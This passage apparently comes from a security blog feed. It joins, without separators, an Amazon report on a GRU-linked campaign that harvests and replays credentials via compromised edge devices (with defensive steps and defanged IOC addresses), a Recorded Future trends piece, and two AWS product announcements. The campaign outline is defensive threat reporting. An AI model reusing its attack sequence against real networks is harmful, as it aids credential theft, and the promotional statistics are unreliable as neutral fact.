Temporal analysis: Time gap between device compromise and authentication attempts against victim services suggests passive collection rather than active credential theft
Credential type: Use of victim organization credentials (not device credentials) for accessing online services indicates interception of user authentication traffic
Known tradecraft: Sandworm operations consistently involve network traffic interception capabilities
Strategic positioning: Targeting of customer network edge devices specifically positions the actor to intercept credentials in transit
Infrastructure targeting
Compromise of infrastructure hosted on AWS: Amazon’s telemetry reveals coordinated operations against customer network edge devices hosted on AWS. This was not due to a weakness in AWS; these appear to be customer misconfigured devices. Network connection analysis shows actor-controlled IP addresses establishing persistent connections to compromised EC2 instances operating customers’ network appliance software. Analysis revealed persistent connections consistent with interactive access and data retrieval across multiple affected instances.
Credential replay operations: Beyond direct victim infrastructure compromise, we observed systematic credential replay attacks against victim organizations’ online services. In observed instances, the actor compromised customer network edge devices hosted on AWS, then subsequently attempted authentication using credentials associated with the victim organization’s domain against their online services. While these specific attempts were unsuccessful, the pattern of device compromise followed by authentication attempts using victim credentials supports our assessment that the actor harvests credentials from compromised customer network infrastructure for replay against target organizations’ online services. Actor infrastructure accessed victims’ authentication endpoints for multiple organizations across critical sectors through 2025, including:
Energy sector: Electric utility organizations, energy providers, and managed security service providers specializing in energy sector clients
Telecommunications: Telecom providers across multiple regions
Geographic distribution: The targeting demonstrates global reach:
North America
Europe (Western and Eastern)
Middle East
The targeting demonstrates sustained focus on the energy sector supply chain, including both direct operators and third-party service providers with access to critical infrastructure networks.
Campaign flow:
Compromise customer network edge device hosted on AWS.
Leverage native packet capture capability.
Harvest credentials from intercepted traffic.
Replay credentials against victim organizations’ online services and infrastructure.
Establish persistent access for lateral movement.
Infrastructure overlap with “Curly COMrades”
Amazon Threat Intelligence identified threat actor infrastructure overlap with group Bitdefender tracks as “Curly COMrades.” We assess these may represent complementary operations within a broader GRU campaign:
Amazon’s telemetry: Initial access vectors and cloud pivot methodology
This potential operational division, where one cluster focuses on network access and initial compromise while another handles host-based persistence and evasion, aligns with GRU operational patterns of specialized subclusters supporting broader campaign objectives.
Amazon’s response and disruption
Amazon remains committed to helping protect customers and the broader internet ecosystem by actively investigating and disrupting sophisticated threat actors.
Immediate response actions:
Identified and notified affected customers of compromised network appliance resources
Enabled immediate remediation of compromised EC2 instances
Shared intelligence with industry partners and affected vendors
Reported observations to network appliance vendors to help support security investigations
Disruption impact: Through coordinated efforts, since our discovery of this activity, we have disrupted active threat actor operations and reduced the attack surface available to this threat activity subcluster. We will continue working with the security community to share intelligence and collectively defend against state-sponsored threats targeting critical infrastructure.
Defending your organization
Immediate priority actions for 2026
Organizations should proactively monitor for evidence of this activity pattern:
1. Network edge device audit
Audit all network edge devices for unexpected packet capture files or utilities.
Review device configurations for exposed management interfaces.
Implement network segmentation to isolate management interfaces.
Review authentication logs for credential reuse between network device management interfaces and online services.
Monitor for authentication attempts from unexpected geographic locations.
Implement anomaly detection for authentication patterns across your organization’s online services.
Review extended time windows following any suspected device compromise for delayed credential replay attempts.
3. Access monitoring
Monitor for interactive sessions to router/appliance administration portals from unexpected source IPs.
Examine whether network device management interfaces are inadvertently exposed to the internet.
Audit for plain text protocol usage (Telnet, HTTP, unencrypted SNMP) that could expose credentials.
4. IOC review Energy sector organizations and critical infrastructure operators should prioritize reviewing access logs for authentication attempts from the IOCs listed below.
AWS-specific recommendations
For AWS environments, implement these protective measures:
Identity and access management:
Manage access to AWS resources and APIs using identity federation with an identity provider and IAM roles whenever possible.
Regularly patch, update, and secure the operating system and applications on your instances.
Detection and monitoring:
Enable AWS CloudTrail for API activity monitoring.
Configure Amazon GuardDuty for threat detection.
Review authentication logs for credential replay patterns.
Indicators of Compromise (IOCs)
IOC Value
IOC Type
First Seen
Last Seen
Annotation
91.99.25[.]54
IPv4
2025-07-02
Present
Compromised legitimate server used to proxy threat actor traffic
185.66.141[.]145
IPv4
2025-01-10
2025-08-22
Compromised legitimate server used to proxy threat actor traffic
51.91.101[.]177
IPv4
2024-02-01
2024-08-28
Compromised legitimate server used to proxy threat actor traffic
212.47.226[.]64
IPv4
2024-10-10
2024-11-06
Compromised legitimate server used to proxy threat actor traffic
213.152.3[.]110
IPv4
2023-05-31
2024-09-23
Compromised legitimate server used to proxy threat actor traffic
145.239.195[.]220
IPv4
2021-08-12
2023-05-29
Compromised legitimate server used to proxy threat actor traffic
103.11.190[.]99
IPv4
2021-10-21
2023-04-02
Compromised legitimate staging server used to exfiltrate WatchGuard configuration files
217.153.191[.]190
IPv4
2023-06-10
2025-12-08
Long-term infrastructure used for reconnaissance and targeting
Note: All identified IPs are compromised legitimate servers that may serve multiple purposes for the actor or continue legitimate operations. Organizations should investigate context around any matches rather than automatically blocking. We observed these IPs specifically accessing router management interfaces and attempting authentication to online services during the timeframes listed.
This payload demonstrates the actor’s methodology: encrypt stolen configuration data, exfiltrate via TFTP to compromised staging infrastructure, and remove forensic evidence.
If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, contact AWS Support.
The cybersecurity landscape is rapidly growing in scale and complexity. Enterprises face a rising tide of sophisticated threats that cannot be contained by traditional, reactive defenses alone. With AI and automation lowering the barrier to entry for attackers exploiting new avenues, there is more opportunity than ever for disruptive, high-volume attacks.
The need for organizations to mature their threat intelligence capabilities is clear, but the road to get there isn’t always easy. Recorded Future’s 2025 State of Threat Intelligence Report found that only 49% of enterprises currently consider their threat intelligence maturity as advanced, yet 87% expect to make significant progress in the next two years.
This gap between today’s capabilities and tomorrow’s ambitions reflects a familiar challenge: organizations have plenty of threat data, but struggle to connect, automate, and operationalize it effectively across teams and tools.
Based on insights from the report, here is what enterprises can expect when it comes to threat intelligence in 2026.
Key Trends Driving Threat Intelligence Evolution
There are several key trends set to shape threat intelligence in the coming year, and organizations wanting to prioritize maturity should be on the lookout for partners that embrace and evolve with these currents in mind.
Vendor Consolidation for Unified Intelligence: Enterprises are looking to reduce tool fragmentation by consolidating threat intelligence vendors and feeds into a single platform. A unified approach promises a “single source of truth,” making it easier to operationalize intelligence across the organization.
Deeper Integration into Security Workflows: Organizations want threat intelligence deeply embedded in their existing security stack rather than as a siloed feed. In fact, 25% of enterprises plan to integrate threat intelligence with additional workflows (e.g. IAM, fraud, GRC) in the next two years to broaden their reach.
Automation and AI Augmentation: To cope with accelerating threats and volumes of data, teams are embracing automation in threat intelligence. The future lies in machine-speed analysis that automatically correlates and enriches intelligence so analysts can focus on high-level judgment.
Fusion of Internal and External Data: Over a third of organizations (36%) plan to combine external threat intelligence with data from their own environment to gain better insight into risk posture (and even benchmark against peers).
Challenges Holding Team Backs Today
Despite this forward momentum, many enterprise teams still struggle with persistent challenges that hinder their threat intelligence efforts.
Integration Gaps: Fragmented ecosystems remain a top concern. Nearly half of organizations (48%) cite poor integration with existing security tools among their biggest pain points.
Credibility and Trust Issues: Data means little if analysts don’t trust the intelligence. Half of enterprises say verifying the credibility and accuracy of threat intelligence is a major challenge.
Signal-to-Noise Overload: With huge volumes of alerts and feeds, 46% of enterprises struggle to filter relevant insight from noise. This information overload hampers visibility into real threats, drains team efficiency, and contributes to analyst burnout.
Lack of Context for Action: Even when threat data is available, 46% of organizations lack the context needed to translate it into meaningful risk insights or actionable priorities.
These barriers help explain why many programs plateau at an intermediate maturity. Teams may ingest more data sources over time, but still fall short on the automation, integration, and context needed for truly advanced, predictive intelligence.
Envisioning Threat Intelligence in 2026: Proactive, Integrated, and Business-Aligned
In the near future, leading enterprises will treat threat intelligence not as a side task but as a strategic function integrated into business processes. This means embedding threat insights directly into risk assessments, vulnerability management, and even board-level decisions on security (notably, 58% of organizations already use threat intelligence to guide business risk assessment decisions today).
Instead of simply reacting to incidents after they occur, advanced threat intelligence programs will analyze patterns and emerging trends to warn of potential attacks before they fully materialize. This doesn’t mean magically “knowing the future,” but sharpening awareness by connecting subtle signals across many sources and mapping them to one’s environment.
Human analysts will still be central for this kind of work, though their capabilities will be augmented by AI such that detection and response happen at machine speed. Intelligence platforms will automatically enrich new indicators, correlate them with ongoing events, and even trigger protective actions in real time—all with analysts overseeing the entire process.
Ultimately, a mature program in 2026 will be measured by the outcomes it enables and the risk it reduces for the organization. This means protecting the assets, uptime, and reputation the business cares about, and improving decision quality at all levels of management.
Implications for 2026 Security Budgets and Investments
As threat intelligence becomes more central to security strategy, it’s also becoming a bigger line item in budgets. In fact, 91% of organizations plan to increase their threat intelligence spending in 2026, reflecting its critical role in an era of escalating cyber threats.
One likely area for these increased funds is platform consolidation. Many teams are reevaluating their myriad point solutions and considering a move to more integrated platforms that unify multiple sources and use cases, reducing complexity and cost over time.
Another likely investment will be in automation and AI capabilities. With cyber talent scarce and alert volumes ever-increasing, it will be vital to budget for tools that automate threat intelligence workflows end-to-end. From data collection and enrichment to triage and even initial response, automation will be key to doing more with the same team.
After integrating Recorded Future into our Cyber Threat Intelligence (CTI) workflow…. We reduced detection time by 40%, from an average of 48 hours to 28 hours. Incident response efficiency improved by 30%, as automated enrichment from Recorded Future replaced manual intelligence gathering. We also identified and mitigated 25% more threats compared to the previous quarter.
Cyber Threat Intelligence Specialist, Large Enterprise Professional Services Company
Organizations should also ensure that new investments deliver contextual intelligence tailored to their business. It’s not enough to simply buy more feeds or tools that spit out data; the value lies in solutions that fuse internal data with external threat feeds and apply analytics to highlight what matters most.
That said, not every organization will have the same needs and challenges. The key to fully maximizing ROI will be aligning spending with the organization’s biggest gaps and pain points. If credibility of data is a major challenge, invest in sources with proven reliability or validation features. If integration is a key issue, focus spending on consolidation projects or appropriate vendor services.
Security teams should also establish clear metrics (such as reduced incident response time or incidents prevented) to measure the impact of threat intelligence investments. For example, over half (54%) of organizations now measure success by improved detection and response times, making it a top metric for demonstrating value delivered by threat intelligence initiatives.
Charting the Course to 2026
Enterprise threat intelligence is undoubtedly maturing and becoming more ingrained in security programs, yet much work still remains. Nearly half of organizations may call themselves “advanced” today, but truly predictive, integrated intelligence at scale is still a goalpost ahead. In looking toward 2026, security leaders should double down on the fundamentals that drive intelligence maturity: integration, automation, and alignment with business priorities.
By breaking down silos between tools and teams, trusting and acting on intelligence through improved data credibility and context, and continually measuring what works, teams can evolve from reactive defense to an anticipatory, intelligence-driven security posture.
So what are some practical next steps? First, it’s wise to benchmark your organization’s current program to identify gaps and opportunities. Tools like Recorded Future’s Threat Intelligence Maturity Assessment provide a structured way to evaluate where you stand today and get tailored recommendations on how to improve.
With that insight, you can develop a roadmap that includes the right people, process, and technology investments to operationalize threat intelligence in the most efficient way. Keep the big picture in mind: the ultimate aim is to see more threats, identify them faster, and take action to reduce risk before damage is done. With a thoughtful strategy and an eye towards these trends, organizations can chart a course from today’s challenges to a more proactive and resilient threat intelligence function in 2026 and beyond.
Today, we’re excited to announce expanded service availability for Dedicated Local Zones, giving customers more choice and control without compromise. In addition to the data residency, sovereignty, and data isolation benefits they already enjoy, the expanded service list gives customers additional options for compute, storage, backup, and recovery.
Dedicated Local Zones are AWS infrastructure fully managed by AWS, built for exclusive use by a customer or community, and placed in a customer-specified location or data center. They help customers across the public sector and regulated industries meet security and compliance requirements for sensitive data and applications through a private infrastructure solution configured to meet their needs. Dedicated Local Zones can be operated by local AWS personnel and offer the same benefits of AWS Local Zones, such as elasticity, scalability, and pay-as-you-go pricing, with added security and governance features.
Since being launched, Dedicated Local Zones have supported a core set of compute, storage, database, containers, and other services and features for local processing. We continue to innovate and expand our offerings based on what we hear from customers to help meet their unique needs.
More choice and control without compromise
The following new services and capabilities deliver greater flexibility for customers to run their most critical workloads while maintaining strict data residency and sovereignty requirements.
New generation instance types
To support complex workloads in AI and high-performance computing, customers can now use newer generation instance types, including Amazon Elastic Compute Cloud (Amazon EC2) generation 7 with accelerated computing capabilities.
AWS storage options
AWS storage options provide two storage classes including Amazon Simple Storage Service (Amazon S3) Express One Zone, which offers high-performance storage for customers’ most frequently accessed data, and Amazon S3 One Zone-Infrequent Access, which is designed for data that is accessed less frequently and is ideal for backups.
Advanced block storage capabilities are delivered through Amazon Elastic Block Store (Amazon EBS) gp3 and io1 volumes, which customers can use to store data within a specific perimeter to support critical data isolation and residency requirements. By using the latest AWS general purpose SSD volumes (gp3), customers can provision performance independently of storage capacity with an up to 20% lower price per gigabyte than existing gp2 volumes. For intensive, latency-sensitive transactional workloads, such as enterprise databases, provisioned IOPS SSD (io1) volumes provide the necessary performance and reliability.
Backup and recovery capabilities
We have added backup and recovery capabilities through Amazon EBS Local Snapshots, which provides robust support for disaster recovery, data migration, and compliance. Customers can create backups within the same geographical boundary as EBS volumes, helping meet data isolation requirements. Customers can also create AWS Identity and Access Management (IAM) policies for their accounts to enable storing snapshots within the Dedicated Local Zone. To automate the creation and retention of local snapshots, customers can use Amazon Data Lifecycle Manager (DLM).
Customers can use local Amazon Machine Images (AMIs) to create and register AMIs while maintaining underlying local EBS snapshots within Dedicated Local Zones, helping achieve adherence to data residency requirements. By creating AMIs from EC2 instances or registering AMIs using locally stored snapshots, customers maintain complete control over their data’s geographical location.
One of GovTech Singapore’s key focuses is on the nation’s digital government transformation and enhancing the public sector’s engineering capabilities. Our collaboration with GovTech Singapore involved configuring their Dedicated Local Zones with specific services and capabilities to support their workloads and meet stringent regulatory requirements. This architecture addresses data isolation and security requirements and ensures consistency and efficiency across Singapore Government cloud environments.
With the availability of the new AWS services with Dedicated Local Zones, government agencies can simplify operations and meet their digital sovereignty requirements more effectively. For instance, agencies can use Amazon Relational Database Service (Amazon RDS) to create new databases rapidly. Amazon RDS in Dedicated Local Zones helps simplify database management by automating tasks such as provisioning, configuring, backing up, and patching. This collaboration is just one example of how AWS innovates to meet customer needs and configures Dedicated Local Zones based on specific requirements.
Chua Khi Ann, Director of GovTech Singapore’s Government Digital Products division, who oversees the Cloud Programme, shared: “The deployment of Dedicated Local Zones by our Government on Commercial Cloud (GCC) team, in collaboration with AWS, now enables Singapore government agencies to host systems with confidential data in the cloud. By leveraging cloud-native services like advanced storage and compute, we can achieve better availability, resilience, and security of our systems, while reducing operational costs compared to on-premises infrastructure.”
Get started with Dedicated Local Zones
AWS understands that every customer has unique digital sovereignty needs, and we remain committed to offering customers the most advanced set of sovereignty controls and security features available in the cloud. Dedicated Local Zones are designed to be customizable, resilient, and scalable across different regulatory environments, so that customers can drive ongoing innovation while meeting their specific requirements.
Ready to explore how Dedicated Local Zones can support your organization’s digital sovereignty journey? Visit AWS Dedicated Local Zones to learn more.
At Amazon Web Services, we’re committed to deeply understanding the evolving needs of both our customers and regulators, and rapidly adapting and innovating to meet them. The upcoming AWS European Sovereign Cloud will be a new independent cloud for Europe, designed to give public sector organizations and customers in highly regulated industries further choice to meet their unique sovereignty requirements. The AWS European Sovereign Cloud expands on the same strong foundation of security, privacy, and compliance controls that apply to other AWS Regions around the globe with additional governance, technical, and operational measures to address stringent European customer and regulatory expectations. Sovereignty is the defining feature of the AWS European Sovereign Cloud and we’re using an independently validated framework to meet our customers’ requirements for sovereignty, while delivering the scalability and functionality you expect from the AWS Cloud.
Today, we’re pleased to share further details about the AWS European Sovereign Cloud: Sovereign Reference Framework (ESC-SRF). This reference framework aligns sovereignty criteria across multiple domains such as governance independence, operational control, data residency and technical isolation. Working backwards from our customers’ sovereign use cases, we aligned controls to each of the criteria and the AWS European Sovereign Cloud is undergoing an independent third-party audit to verify the design and operations of these controls conform to AWS sovereignty commitments. Customers and partners can also leverage the ESC-SRF as a foundation upon which they can build their own complementary sovereignty criteria and controls when using the AWS European Sovereign Cloud.
To clearly explain how the AWS European Sovereign Cloud meets sovereignty expectations, we’re publishing the ESC-SRF in AWS Artifact including the criteria and control mapping. In AWS Artifact, our self-service audit artifact retrieval portal, you have on-demand access to AWS security and compliance documents and AWS agreements. You can now use the ESC-SRF to define best practices for your own use case, map these to controls, and illustrate how you meet and even exceed sovereign needs of your customers.
A transparent and validated sovereignty model
The ESC-SRF has been built from customer feedback, regulatory requirements across the European Union (EU), industry frameworks, AWS contractual commitments, and partner input. ESC-SRF is industry and sector agnostic, as it’s written to address fundamental sovereignty needs and expectations at the foundational layer of our cloud offerings with additional sovereignty-specific requirements and controls that apply exclusively to the AWS European Sovereign Cloud. Each criterion is implemented through sovereign controls that will be independently validated by a third-party auditor.
The framework builds on core AWS security capabilities, including encryption, key management, access governance, AWS Nitro System-based isolation, and internationally recognized compliance certifications. The framework adds sovereign-specific governance, technical, and operational measures such as independent EU corporate structures, dedicated EU trust and certificate services, operations by AWS EU-resident personnel, strict residency for customer data and customer created metadata, separation from all other AWS Regions, and incident response operated within the EU.
These controls are the basis of a dedicated AWS European Sovereign Cloud System and Organization Controls (SOC) 2 attestation. The ESC-SRF establishes a solid foundation for sovereignty of the cloud, so that customers can focus on defining sovereignty measures in the cloud that are tailored to their goals, regulatory needs, and risk posture.
How you can use the ESC-SRF
The ESC-SRF describes how AWS implements and validates sovereignty controls in the AWS European Sovereign Cloud. AWS treats each criterion as binding and its implementation will be validated by an independent third-party auditor in 2026. While most customers don’t operate at the size and scale of AWS, you can use the ESC-SRF as both an assurance model and a reference framework you can adapt to your specific use cases.
From an assurance perspective, it provides end-to-end visibility for each sovereignty criterion through to its technical implementation. We will also provide third-party validation in the AWS European Sovereign Cloud SOC 2 report. Customers can use this report with internal auditors, external assessors, supervisory authorities, and regulators. This can reduce the need for ad-hoc evidence requests and supports customers by providing them with evidence to demonstrate clear and enforceable sovereignty assurances.
From a design perspective, you can refer to the framework when shaping your own sovereignty architecture, selecting configurations, and defining internal controls to meet regulatory, contractual, and mission-specific requirements. Because the ESC-SRF is industry and sector agnostic, you can apply criteria from the framework to suit your own unique needs. Depending on your sovereign use case, not all criteria may apply to your use case sovereign needs. The ESC-SRF can also be used in conjunction with AWS Well-Architected which can help you learn, measure, and build using architectural best practices. Where appropriate you can create your version of the ESC-SRF, map to controls, and have them tested by a third party. To download the ESC-SRF, visit AWS Artifact (login required).
A strong, clear foundation
The publication of the ESC-SRF is part of our ongoing commitment to delivering on the AWS Digital Sovereignty Pledge through transparency and assurances to help customers meet their evolving sovereignty needs with assurances designed, implemented, and validated entirely within the EU. Within the framework, customers can build solutions in the AWS European Sovereign Cloud with confidence and a strong understanding of how they are able to meet their sovereignty goals using AWS.
For more information about the AWS European Sovereign Cloud, visit aws.eu.
If you have feedback about this post, submit comments in the Comments section below.